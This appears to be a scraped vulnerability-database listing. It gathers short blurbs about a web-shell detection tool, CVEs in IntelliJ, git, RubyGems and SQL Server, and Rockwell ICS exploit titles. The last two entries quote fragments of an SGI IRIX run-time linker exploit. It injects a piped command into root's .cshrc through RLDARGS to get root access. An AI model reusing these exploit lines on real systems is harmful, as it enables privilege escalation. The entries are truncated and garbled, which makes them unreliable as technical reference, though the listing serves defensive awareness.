Shellsum - A Defense Tool - Detect Web Shells In Local Directories Via Md5Sum

A defense tool - detect web shells in local directories via md5sum Features Fast speed Lightweight Big database Tabled output Usages Install git clone https://github.com/ManhNho/shellsum.git chmod 755 -R shellsum/ cd shellsum/ pip install -r requirements.txt Run python shellsum.py ToDo Smooth...

OracleVM 3.3 / 3.4 : dbus (OVMSA-2019-0034)

The remote OracleVM system is missing necessary patches to address critical security updates : - fix netlink poll: error 4 Zhenzhong Duan - Apply patch for CVE-2019-12749 1725574 - Fix CVE-2019-12749 1725574 - Add dbus-run-session 1268972 C Tenable Network Security, Inc. The package checks in thi...

Microsoft Office 365 (2016 Click-to-Run) Multiple Vulnerabilities (Jul 2019)

This host is missing an important security update according to Microsoft Office Click-to-Run updates. SPDX-FileCopyrightText: 2019 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier:...

CVE-2019-9823

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

CVE-2019-10104

In several JetBrains IntelliJ IDEA Ultimate versions, an Application Server run configuration for Tomcat, Jetty, Resin, or CloudBees with the default setting allowed a remote attacker to execute code when the configuration is running, because a JMX server listened on all interfaces instead of...

CVE-2019-9823

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

Design/Logic Flaw

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

UBUNTU-CVE-2019-9823

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

CVE-2019-9872

In several versions of JetBrains IntelliJ IDEA Ultimate, creating run configurations for cloud application servers leads to saving a cleartext unencrypted record of the server credentials in the IDE configuration files. If the Settings Repository plugin was then used and configured to synchronize...

CVE-2019-9823

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

The vulnerability of the wfst_run application, which is part of the speech-tools speech recognition system, allows a violator to cause a service failure.

The vulnerability of the wfstrun application, which is part of the speech-tools speech recognition system, is related to overflow errors in the command line processing. Exploiting this vulnerability can allow an attacker to cause a service failure by submitting commands with specially crafted...

Updated git packages fix security vulnerability

Git before 2.19.2 on Linux and UNIX executes commands from the current working directory as if '.' were at the end of $PATH in certain cases involving the runcommand API and run-command.c, because there was a dangerous change from execvp to execv during 2017 CVE-2018-19486...

Microsoft Office 365 (2016 Click-to-Run) Multiple RCE Vulnerabilities (Jun 2019)

This host is missing an important security update according to Microsoft Office Click-to-Run updates. SPDX-FileCopyrightText: 2019 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier:...

Microsoft SQL Server CVE-2019-0819 Information Disclosure Vulnerability

Description Microsoft SQL Server is prone to an information-disclosure vulnerability. An attacker can leverage this issue to obtain sensitive information that may aid in further attacks. Technologies Affected Microsoft SQL Server 2017 for x64-based Systems Recommendations Block external access at...

rubygems: Escape sequence injection vulnerability in errors

An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManagerrun calls alerterror without escaping, escape sequence injection is possible. There are many ways to cause an error...

Rockwell Automation Micrologix 1400 <= 21.2 Exploitable Access Control

Binary data 720215.prm...

Rockwell Automation/Allen-Bradley Multiple Devices Authentication Bypass (ICSA-18-310-02)

Binary data 720141.prm...

Rockwell Automation Micrologix 1400 <= 21.2 Fault Bits Exploit

Binary data 720224.prm...

SGI IRIX <= 6.4.x Run-Time Linker Arbitrary File Creation Exploit

SGI IRIX versions 6.4.x and below run-time linker rld arbitrary file creation exploit. !/bin/sh SGI IRIX /etc/passwd" /tmp/.x.sh chmod 755 /tmp/.x.sh RLDARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su last -3 root echo " waiting 5mins for root to login..." sleep 300 su - w00t 0day.today 2019-04-30...

SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

!/bin/sh SGI IRIX /etc/passwd" /tmp/.x.sh chmod 755 /tmp/.x.sh RLDARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su last -3 root echo " waiting 5mins for root to login..." sleep 300 su - w00t...